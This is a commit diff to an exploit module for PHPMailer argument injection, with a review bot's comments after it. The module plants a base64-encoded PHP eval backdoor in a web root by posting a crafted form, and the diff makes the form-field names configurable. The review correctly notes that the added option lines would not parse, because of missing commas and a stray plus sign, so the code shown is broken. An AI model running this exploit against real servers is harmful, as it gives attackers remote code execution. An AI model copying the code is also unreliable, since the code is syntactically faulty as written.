
Commit ae8f1c3

authored
Update on phpmailer_arg_injection.rb #15810
Added Regex to validate new options
1 parent e9b2fc6 commit ae8f1c3


1 file changed

+10
-4
lines changed


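--- a/modules/exploits/multi/http/phpmailer_arg_injection.rb
+++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -60,7 +60,10 @@ def initialize(info = {})
 ])
 register_advanced_options(
 [
-OptInt.new('WaitTimeout', [true, 'Seconds to wait to trigger the payload', 300])
+OptInt.new('WaitTimeout', [true, 'Seconds to wait to trigger the payload', 300])+
+OptString.new('NameField', [true, 'Name of the element for the Name field', 'name'], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
+OptString.new('EmailField', [true, 'Name of the element for the Email field', 'email'] regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
+OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'] regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/)
 ])
 end
 
@@ -98,6 +101,9 @@ def trigger(trigger_uri)
 end
 
 def exploit
+name_field = datastore['NameField']
+email_field = datastore['EmailField']
+message_field = datastore['MessageField']
 payload_file_name = "#{rand_text_alphanumeric(8)}.php"
 payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
@@ -111,9 +117,9 @@ def exploit
 
 data = Rex::MIME::Message.new
 data.add_part('submit', nil, nil, 'form-data; name="action"')
-data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
-data.add_part(email, nil, nil, 'form-data; name="email"')
-data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
+data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
+data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")
 
 print_status("Writing the backdoor to #{payload_file_path}")
 res = send_request_cgi(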
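Review bot: The added `EmailField` and `MessageField` entries in the first hunk have no comma between the option array and `regex:`, and the `WaitTimeout` line as rendered ends in `+` instead of `,`, so the options array would not parse as written; each entry needs the shape `OptString.new('EmailField', [true, '...', 'email'], regex: ...),`. The validation pattern is anchored with `^` and `$`, which in Ruby match at line boundaries, so a value containing a newline can pass the check and still be interpolated into the part header in the third hunk; `\A` and `\z` anchor the whole string. The pattern also admits only lowercase names of at most 32 characters, which looks borrowed from a username rule and may reject valid form field names, so a short comment stating the intended character set would help. The third hunk changes the `name=` parameter from double to single quotes, which alters the header that is sent; `"form-data; name=\"#{name_field}\""` keeps the quoting of the removed lines. Both `initialize` and `exploit` continue outside the hunks shown.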
